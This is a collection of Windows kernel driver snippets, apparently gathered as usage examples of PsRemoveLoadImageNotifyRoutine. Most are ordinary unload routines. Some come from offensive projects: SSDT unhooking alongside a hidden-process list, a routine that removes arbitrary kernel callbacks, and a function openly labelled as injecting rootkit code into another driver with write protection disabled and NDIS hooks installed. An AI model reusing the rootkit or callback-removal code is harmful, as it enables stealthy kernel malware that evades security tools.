/* * DrvUnload * Driver unload point */ extern "C" void DrvUnload(PDRIVER_OBJECT driver) { // Log entry LOG("Unloading driver"); // Destroy image-load callback LOG2("Unregistering image-load callback"); PsRemoveLoadImageNotifyRoutine((PLOAD_IMAGE_NOTIFY_ROUTINE)&ImageLoadCallback); // Destroy process-creation callback LOG2("Unregistering process-creation callback"); NC_PROCESSCREATE_NOTIFY(ProcessCreateCallback, 1); // Destroy thread-creation callback LOG2("Unregistering thread-creation callback"); PsRemoveCreateThreadNotifyRoutine((PCREATE_THREAD_NOTIFY_ROUTINE)&ThreadCreateCallback); // Unmap memory if need be CloseLinks(); // Convert devlink string UNICODE_STRING devLink; RtlInitUnicodeString(&devLink, devicelink); // Delete symlink LOG2("Deleting sym-link to device"); IoDeleteSymbolicLink(&devLink); // Delete device LOG2("Deleting device"); IoDeleteDevice(driver->DeviceObject); // Log exit LOG("Driver unloaded"); }
void DtraceUnload(PDRIVER_OBJECT DrvObj) { NTSTATUS st; LARGE_INTEGER tm; ZwUnloadDriver(&fbtsys); ZwUnloadDriver(&profilesys); ZwUnloadDriver(&fttpsys); while (dtrace_ref != 0 || dtrace_unload(DrvObj) != 0) { tm.QuadPart = UNLOAD_RETRY_DELAY_TIME; dprintf("dtrace.sys: Unload failed. Retry in %ds\n", abs(UNLOAD_RETRY_DELAY_TIME)/10000000); KeDelayExecutionThread(KernelMode, FALSE, &tm); } PsRemoveLoadImageNotifyRoutine(ProcKernelModuleLoaded); free_thread_list(); free_proc_list(); IoFreeWorkItem(WorkItem1); int_freecore(); IoDeleteSymbolicLink(&deviceLink); IoDeleteSymbolicLink(&deviceHelperLink); IoDeleteDevice(DrvObj->DeviceObject); }
VOID Unload(__in PDRIVER_OBJECT pDriverObject) { PsRemoveLoadImageNotifyRoutine(imageCallback); FreeList(); IoDeleteSymbolicLink(&usDosDeviceName); IoDeleteDevice(pDriverObject->DeviceObject); }
/* * DriverUnload * * Purpose: * * Driver unload procedure. * */ VOID DriverUnload( _In_ struct _DRIVER_OBJECT *DriverObject ) { PAGED_CODE(); UNICODE_STRING SymLink; #ifdef _DEBUGMSG DbgPrint("[TSMI] Unload, DrvObj = %p\n", DriverObject); #endif if (g_NotifySet) { PsRemoveLoadImageNotifyRoutine(TsmiPsImageHandler); } KeWaitForSingleObject(&g_VBoxDD.Lock, Executive, KernelMode, FALSE, NULL); if (g_VBoxDD.Chains) { ExFreePoolWithTag(g_VBoxDD.Chains, TSUGUMI_TAG); g_VBoxDD.Chains = NULL; g_VBoxDD.ChainsLength = 0; } KeReleaseMutex(&g_VBoxDD.Lock, FALSE); RtlInitUnicodeString(&SymLink, TSUGUMI_SYM_LINK); IoDeleteSymbolicLink(&SymLink); IoDeleteDevice(DriverObject->DeviceObject); }
/** * Unload the driver. Free all resources. */ VOID DrvUnload( IN PDRIVER_OBJECT pstDriverObject ) { // // pstDriverObject - Pointer to driver object. // UNICODE_STRING usDeviceLink; dprintf( "VwFirewallDrv.sys: Unloading driver...\n" ); // // Uninstall Filesystem Api Hooks // fsapihook_hook_uninstall(); // // 结束 RDP 端口读取线程 // procrdp_thread_readport_terminate(); // // 卸载防火墙回调函数 // if ( g_stSysInfo.bFirewallLoaded ) { if ( NT_SUCCESS( SetFilterFunction( callbackFilterFunction, FALSE ) ) ) { g_stSysInfo.bFirewallLoaded = FALSE; } } // // 卸载配置信息 // procconfig_unload_config(); // // Remove CreateProcessNotifyRoutine & LoadImageNotifyRoutine // PsSetCreateProcessNotifyRoutine( procprocess_CreateProcessNotifyRoutine, TRUE ); PsRemoveLoadImageNotifyRoutine( procprocess_LoadImageNotifyRoutine ); // // Remove symbolic link // RtlInitUnicodeString( &usDeviceLink, DOS_DEVICE_NAME ); IoDeleteSymbolicLink( &usDeviceLink ); // // Remove the device // IoDeleteDevice( pstDriverObject->DeviceObject ); }
////////////////////////////////////////////////////////////////////////////////////////////////////////////// // Description : // Driver unload callback. Removes hooks, callbacks, and communication stuff. // Parameters : // Process : // Removes hooks, callbacks, device driver symbolic link / device, and cleans the monitored // processes linked list. ////////////////////////////////////////////////////////////////////////////////////////////////////////////// VOID Unload(PDRIVER_OBJECT pDriverObject) { unhook_ssdt_entries(); CmUnRegisterCallback(cookie); PsRemoveLoadImageNotifyRoutine(imageCallback); IoDeleteSymbolicLink(&usDosDeviceName); IoDeleteDevice(pDriverObject->DeviceObject); cleanMonitoredProcessList(); cleanHiddenProcessList(); }
//----------------------------------------------------------------------------- // Unload driver //----------------------------------------------------------------------------- VOID OnUnload(IN PDRIVER_OBJECT DriverObject) { DbgPrint("---------------- Driver Unloaded\n"); InterlockedExchange( (unsigned int *) &syscall_tbl[SYSCALL_INDEX(ZwLoadDriver)], (unsigned int) orig_ZwLoadDriver); if(mdl_sys_call) { MmUnmapLockedPages(syscall_tbl, mdl_sys_call); IoFreeMdl(mdl_sys_call); } // remove callback #if BREAK_POINT PsRemoveLoadImageNotifyRoutine(add_one_time_bp); #endif #if DATA_MINING PsRemoveLoadImageNotifyRoutine(add_hooks_for_data_mining); #endif }
VOID DrvDumpDriverUnload(__in PDRIVER_OBJECT DriverObject) { UNICODE_STRING DeviceLinkName; DbgPrint("[*] DrvDump Unloading\n"); PsRemoveLoadImageNotifyRoutine(LoadImageCallback); RtlInitUnicodeString(&DeviceLinkName, DRVMON_WIN32_DEVICE_NAME); IoDeleteSymbolicLink(&DeviceLinkName); IoDeleteDevice(DriverObject->DeviceObject); }
/****************************************************************************** * Driver unload handler * ******************************************************************************/ static VOID DDKAPI my_unload(PDRIVER_OBJECT DriverObject) { ANSI_STRING SymbolicLinkNameA; UNICODE_STRING SymbolicLinkNameW; DbgPrint("DriverUnload called\r\n"); PsSetCreateProcessNotifyRoutine(create_process_watcher, TRUE); PsRemoveLoadImageNotifyRoutine(load_image_watcher); RtlInitString(&SymbolicLinkNameA, MY_DOSDEVICE_NAME); RtlAnsiStringToUnicodeString(&SymbolicLinkNameW, &SymbolicLinkNameA, TRUE); IoDeleteSymbolicLink(&SymbolicLinkNameW); IoDeleteDevice(DriverObject->DeviceObject); for (int i = 0; i < ENT_CNT; ++i) if(g_proc_table[i].pid) DbgPrint("Registered process stays: %d\r\n", g_proc_table[i].pid); }
/*************************************************** Description: Release all resources and remove the driver object. */ VOID EasyHookUnload(IN PDRIVER_OBJECT InDriverObject) { UNICODE_STRING DosDeviceName; // remove all hooks and shutdown thread barrier... LhCriticalFinalize(); LhBarrierProcessDetach(); PsRemoveLoadImageNotifyRoutine(OnImageLoadNotification); /* Delete the symbolic link */ RtlInitUnicodeString(&DosDeviceName, EASYHOOK_DOS_DEVICE_NAME); IoDeleteSymbolicLink(&DosDeviceName); /* Delete the device object */ IoDeleteDevice(InDriverObject->DeviceObject); }
NTSTATUS RemoveCallbackNotify(PVOID InBuffer) { NTSTATUS Status = STATUS_SUCCESS; PREMOVE_CALLBACK Temp = (PREMOVE_CALLBACK)InBuffer; ULONG_PTR CallbackAddress = Temp->CallbackAddress; CALLBACK_TYPE CallBackType = Temp->NotifyType; if (!CallbackAddress || !MmIsAddressValid((PVOID)CallbackAddress)) { return STATUS_UNSUCCESSFUL; } DbgPrint("CallBackType: %d\r\n",CallBackType); switch(CallBackType) { case NotifyLoadImage: { DbgPrint("Remove NotifyLoadImage\r\n"); Status = PsRemoveLoadImageNotifyRoutine((PLOAD_IMAGE_NOTIFY_ROUTINE)CallbackAddress); break; } case NotifyCmCallBack: { LARGE_INTEGER Cookie; ULONG_PTR Note = Temp->Note; Cookie.QuadPart = 0; DbgPrint("Remove NotifyCmCallBack\r\n"); if (WinVersion == WINDOWS_XP) { Cookie = XpGetRegisterCallbackCookie(Note); } if (WinVersion==WINDOWS_7) { Cookie.QuadPart = Note; } if (Cookie.LowPart == 0 && Cookie.HighPart == 0) { return STATUS_UNSUCCESSFUL; } Status = CmUnRegisterCallback(Cookie); break; } case NotifyKeBugCheckReason: { PREMOVE_CALLBACK Temp = (PREMOVE_CALLBACK)InBuffer; ULONG_PTR Note = Temp->Note; if (Note!=NULL&&MmIsAddressValid((PVOID)Note)) { KeDeregisterBugCheckReasonCallback((PKBUGCHECK_REASON_CALLBACK_RECORD)Note); } break; } case NotifyShutdown: { LARGE_INTEGER Cookie; PREMOVE_CALLBACK Temp = (PREMOVE_CALLBACK)InBuffer; ULONG_PTR Note = Temp->Note; if (Note!=NULL&&MmIsAddressValid((PVOID)Note)) { IoUnregisterShutdownNotification((PDEVICE_OBJECT)Note); } break; } case NotifyCreateThread: { NTSTATUS Status = STATUS_SUCCESS; PREMOVE_CALLBACK Temp = (PREMOVE_CALLBACK)InBuffer; ULONG_PTR CallbackAddress = Temp->CallbackAddress; if (!CallbackAddress || !MmIsAddressValid((PVOID)CallbackAddress)||!PsRemoveCreateThreadNotifyRoutine) { return STATUS_UNSUCCESSFUL; } Status = PsRemoveCreateThreadNotifyRoutine((PCREATE_THREAD_NOTIFY_ROUTINE)CallbackAddress); break; } default: { Status = STATUS_UNSUCCESSFUL; } } return Status; }
/* * DevioctlDispatch * * Purpose: * * IRP_MJ_DEVICE_CONTROL dispatch. * */ NTSTATUS DevioctlDispatch( _In_ struct _DEVICE_OBJECT *DeviceObject, _Inout_ struct _IRP *Irp ) { NTSTATUS status = STATUS_SUCCESS; PIO_STACK_LOCATION stack; ULONG_PTR bytesIO = 0; UNREFERENCED_PARAMETER(DeviceObject); stack = IoGetCurrentIrpStackLocation(Irp); if (stack != NULL) { switch (stack->Parameters.DeviceIoControl.IoControlCode) { case TSUGUMI_IOCTL_REFRESH_LIST: status = TsmiLoadParameters(); if (g_NotifySet == FALSE) { if (NT_SUCCESS(status)) { status = PsSetLoadImageNotifyRoutine(TsmiPsImageHandler); if (NT_SUCCESS(status)) { g_NotifySet = TRUE; #ifdef _DEBUGMSG DbgPrint("[TSMI] DevioctlDispatch:NotifySet=%lx\n", g_NotifySet); #endif } } } #ifdef _DEBUGMSG else { DbgPrint("[TSMI] DevioctlDispatch:Notify already installed\n"); } #endif bytesIO = g_NotifySet; break; case TSUGUMI_IOCTL_MONITOR_STOP: bytesIO = 0; if (g_NotifySet) { status = PsRemoveLoadImageNotifyRoutine(TsmiPsImageHandler); if (NT_SUCCESS(status)) { g_NotifySet = FALSE; bytesIO = 1; } } break; default: status = STATUS_INVALID_PARAMETER; }; } else { status = STATUS_INTERNAL_ERROR; } Irp->IoStatus.Status = status; Irp->IoStatus.Information = bytesIO; IoCompleteRequest(Irp, IO_NO_INCREMENT); return status; }
//-------------------------------------------------------------------------------------- NTSTATUS NewDriverEntry(PDRIVER_OBJECT DriverObject, PUNICODE_STRING RegistryPath) { // disable memory write protection ClearWp(); // restore original code from image entry point memcpy(m_HookedEntry, m_EpOriginalBytes, EP_PATCH_SIZE); // enable memory write protection SetWp(); NTSTATUS ns = m_HookedEntry(DriverObject, RegistryPath); DbgMsg(__FUNCTION__"(): Hooked driver returns 0x%.8x\n", ns); if (PsRemoveLoadImageNotifyRoutine(LoadImageNotify) == STATUS_SUCCESS) { m_bDriverMustBeFreed = TRUE; } if (NT_SUCCESS(ns)) { PVOID Image = ExAllocatePool(NonPagedPool, m_DriverSize); if (Image) { // prepare rootkit code for injection into the discardable sections memcpy(Image, m_DriverBase, m_DriverSize); RuntimeProcessRelocs(Image, (PVOID)((PUCHAR)m_FreeAreaFound - m_RkOffset)); // disable memory write protection ClearWp(); memcpy(m_FreeAreaFound, RVATOVA(Image, m_RkOffset), m_RkSize); // enable memory write protection SetWp(); PUCHAR PointerFixup = (PUCHAR)m_FreeAreaFound - m_RkOffset; // set up NDIS hooks DriverEntryInitializePayload(PointerFixup); PKSTART_ROUTINE Start = (PKSTART_ROUTINE)RECALCULATE_POINTER(DriverEntryContinueThread); DbgMsg(__FUNCTION__"(): Start address: "IFMT"\n", Start); // create thread for execution copied code HANDLE hThread = NULL; ns = PsCreateSystemThread( &hThread, THREAD_ALL_ACCESS, NULL, NULL, NULL, Start, m_bDriverMustBeFreed ? m_DriverBase : NULL ); if (NT_SUCCESS(ns)) { ZwClose(hThread); } else { DbgMsg("PsCreateSystemThread() fails: 0x%.8x\n", ns); } ExFreePool(Image); } // don't allow to unload target driver DriverObject->DriverUnload = NULL; } return ns; }
//-------------------------------------------------------------------------------------- void DriverUnload(PDRIVER_OBJECT DriverObject) { DbgMsg(__FILE__, __LINE__, "DriverUnload()\n"); PsRemoveLoadImageNotifyRoutine(LoadImageNotify); }